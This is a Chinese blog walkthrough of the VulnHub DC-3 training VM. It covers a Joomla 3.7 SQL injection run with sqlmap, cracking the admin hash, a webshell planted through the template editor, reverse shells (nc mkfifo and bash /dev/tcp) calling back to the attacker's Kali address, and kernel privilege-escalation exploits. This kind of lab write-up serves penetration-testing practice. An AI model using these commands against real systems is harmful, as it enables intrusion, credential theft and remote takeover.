【Vulnhub系列】DC3

最新推荐文章于 2024-04-11 10:57:39 发布
最新推荐文章于 2024-04-11 10:57:39 发布
阅读量5k 收藏 5
点赞数
分类专栏: VULNHUB靶场题解集合
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/115519245
版权

文章目录


靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip

基本信息

Kali:192.168.61.145

DC3:192.168.61.163

实验过程

同样先通过arpscan扫描找出DC3的IP地址

sudo arp-scan --interface eth0 192.168.61.1/24

这里可以直接看出DC3的IP地址为192.168.61.163

然后我们使用nmap对目标进行扫描

发现目标主机只是打开了80端口

在这里插入图片描述

然后我们查看下80端口,通过wappalyzer,发现用的是Joomla

同时主页也给我们提示,表明这个靶机只有一个flag
在这里插入图片描述

在这里插入图片描述

这里我们使用joomscan专用扫描器,来获取网页更详细的信息

joomscan:https://github.com/OWASP/joomscan

perl joomscan.pl -u http://192.168.61.163

在这里插入图片描述

可以看到joomla的详细版本号和管理后台

在这里插入图片描述

我们通过searchsploit查看是否有可以用的EXP

searchsploit joomla 3.7

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gJV5fpWm-1617862511015)(45588D1F98CB41D7AE768DE714D394C0)]

可以看到有一个SQL注入漏洞

searchsploit -x php/webapps/42033.txt

在这里插入图片描述

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

接下来就是导出admin的账号密码,就只放个最后的结果图,攻击过程的语句如下

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomaladb --tables

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T "#__users" --columns

sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fGmPoQ2i-1617862511022)(2783758B28224F64AB8B3AEFF69011C2)]

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

我们将password的HASH值用john进行破解

在这里插入图片描述

解密后的结果为:snoopy

我们尝试进行登陆,发现是正确的账号密码

账号:admin
密码:snoopy

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R5FfxlOS-1617862511031)(1B7E2F5C471E4DF886BEFE8854449231)]

在这里插入图片描述

进入后台后,就要想办法上传一句话木马。

百度到可以编辑模板来上传一个webshell

在这里插入图片描述

这里编辑Beez3模板
在这里插入图片描述

这里我在html目录下创建了一个名为dfz.php的webshell

在这里插入图片描述

然后我们访问下这个webshell,没有出现404说明成功上传

http://192.168.61.163/templates/beez3/html/dfz.php

在这里插入图片描述

接下来用蚁剑来链接
在这里插入图片描述

我们在Kali上使用nc,通过蚁剑反弹一个shell

我们现在Kali上建立监听
在这里插入图片描述

发现DC3上有python环境,尝试使用python来弹shell,但是Kali上没有任何反应

在这里插入图片描述

然后尝试使用bash来弹shell,但是也是不行
在这里插入图片描述

尝试使用nc反弹成功

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.61.145 2222 >/tmp/f

在这里插入图片描述

然后使用python改善shell环境

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

获取下Linux版本,可以看到是Ubuntu 16.04
在这里插入图片描述

我们查找下有没有可以利用的提权EXP,通过searchsploit有好几个

在这里插入图片描述

这里我们使用下面的EXP尝试提权

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                             | linux/local/39772.txt

我们打开这个EXP的介绍,并到指定网站下载
在这里插入图片描述

https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip

通过蚁剑上传到靶机
在这里插入图片描述

然后接下来的话就是解压、编译、执行EXP来获得root权限,所有命令如下

unzip 39772.zip
cd 39772
tar -xvf exploit.tar

在这里插入图片描述

./compile.sh

在这里插入图片描述

./doubleput

在这里插入图片描述

获得flag
在这里插入图片描述

额外补充

利用php反弹shell

system("bash -c 'bash -i >& /dev/tcp/192.168.61.145/2222 0>&1'");

在这里插入图片描述

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.61.145 2222 >/tmp/f');

在这里插入图片描述

使用Linux-Exploit-suggestion来辅助提权

下载地址:https://github.com/mzet-/linux-exploit-suggester

上传到/tmp中,并加权执行

chmod +x linux-exploit-suggester.sh

在这里插入图片描述

在这里插入图片描述

这里尝试下CVE-2016-5195

EXP地址:https://github.com/gbonacini/CVE-2016-5195

下载完成后通过蚁剑上传,并解压

在这里插入图片描述

然后进入目录后make下就可以得到dcow文件,执行./dcow -s 尝试提权

然后靶机就死机了,说明这个EXP不适合
在这里插入图片描述

大方子
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub通关-3 DC-3(含靶场资源)
Brucye
02-07 926
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)链接:https://pan.baidu.com/s/1tJr7V5ZbYMtfCLeOa40r2Q。建议不要使用https源,https更换源需要处理安全问题较为麻烦,我这里直接使用的http源。注意:doublepu.c执行后会生成doublepu 要再次执行doublepu。这款工具是专门对Joomla框架进行扫描的,需要进行下载。3.接下来选择你想导入的路径,进行导入即可。
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
热门推荐
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
Vulnhub靶机:DC-3渗透详细过程
菜鸟学渗透
04-11 802
Vulnhub靶机:DC-3渗透详细过程
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 1016
Vulnhub-DC-3靶机实战
vulnhub靶场,DC-3
kukudeshuo的博客
07-11 430
vulnhub靶场,DC-3 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 攻击机:kali(192.168.58.130) 靶机:DC-3(192.168.58.146) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.146 使用nmap扫描查看目标靶机端口开放情况 可以看到目标靶机只开放
Vulnhub靶机:DC3
qq_48904485的博客
02-14 659
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC3(10.0.2.56)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/
vulnhub靶场库中 DC:1
07-06
Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和掌握基础的渗透测试技巧和漏洞利用...
VulnHub系列DC- 1-Walkthrough.pdf
10-30
VulnHub系列DC: 1-Walkthrough,内附工具、知识点和漏洞靶场地址。图文并茂
vulnhub靶场实战系列-DC-1实战流程图
05-17
vulnhub-DC3
weixin_55129870的博客
05-15 487
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
Exploit-DB 使用小结
未完成的歌~的博客
09-23 3080
是一个漏洞库网站 ,存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新。searchsploit 是一个用于搜索 Exploit-DB 漏洞数据的命令行工具(Kali默认已安装),可以离线搜索 Exploit 数据库,这对于有时候不能联网的渗透工作非常的有用。
Vulnhub靶场实战———DC3
m0_67309561的博客
05-04 245
Vulnhub靶场通关
DC-3渗透实战(详细过程)
tzyyyyyy的博客
10-16 2574
DC-3靶机渗透实战 利用各种姿势方法获取最终flag
vulnhubDC3.2靶机
LainWith的博客
02-16 2814
目录介绍信息收集主机发现主机信息探测访问网站漏洞发现Sqlmap注入挂马提权 介绍 系列DC(此系列共10台) 发布日期:2020年4月25日 难度:初级-中级 Flag:获取root权限并读取唯一的Flag 学习: sql注入 挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-32,312/ 从靶场得到提示信息: 靶机更适用Virtualbox 信息收集 主机发现 netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtec
DC3算法(后缀数组生成)
xiaolu567的博客
06-27 1389
如果我要对数组排序的话,按字符串的字典序来排,这个就是后缀数组 以某个位置开始后面整体的后缀串,它在所有开头位置的后缀串中排名第几,把它自己的排名作为一个数组,返回跟它对应的就是rank数组(原始下标按字典序的排名) 后缀数组跟rank数组就是一种转换关系,后缀数组可以在O(N)的时间内转化为rank数组 rank数组可以在O(N)的时间内转化为后缀数组后缀数组+rank数组可以接解决非常多的字符串问题 还能去做RMQ问题 关键点在于后缀数组怎么样形成最方便它的地位非常高,很多的问题都是由后缀树或后缀数组实
DC3算法相关题目
xiaolu567的博客
06-28 541
给定两个字符串str1和str2, 想把str2整体插入到str1中的某个位置 形成最大的字典序 返回字典序最大的结果每次拼出一个N+M的串N>>M,复杂度N^2 DC3算法解 那么,我们该如何把str2插入str1最好 在str1中如果i出发所有往后字典序>=str2字典序,str2没有必要插在i之前 如果每个位置开头字典序都大于str2, 那么str2放在最后 如果某个位置字典序小于str2的字典序,str2有可能插在i之前,也有可能在i之后i-1~i之间的可能性不可以忽略寻找一个范围最左的可能性~最
vulnhub靶场实战系列(二)之 prime1
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 450
接下来我们就要去找网站的漏洞点利用了,熟悉wordpress的朋友都知道,woedpress有一个主题编辑器 Appearance—>Theme Editor可以修改文件,我们可以向这个文件中写入反弹的shell,来获得目标机器的控制权。这里就犯难了,那么多的参数,我们哪里看的过来,所以这里我们需要改变一下思路,去找那些不相同的,我们可以看到大部分的响应内容都是12 word的,那我们就过滤12个Word的结果看看。现在我们已经获得了一个普通用户的权限,接下来就是提权得到root权限,最终得到flag。
iot-dc3nacos配置
最新发布
06-21
当将IoT-DC3(假设是某种DC/DC控制器的具体型号或产品)与Nacos集成,一般步骤可能包括: 1. **Nacos服务注册**:IoT-DC3设备需要连接到Nacos服务器,将自己的存在和服务地址注册为Nacos客户端,这样配置信息才能被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值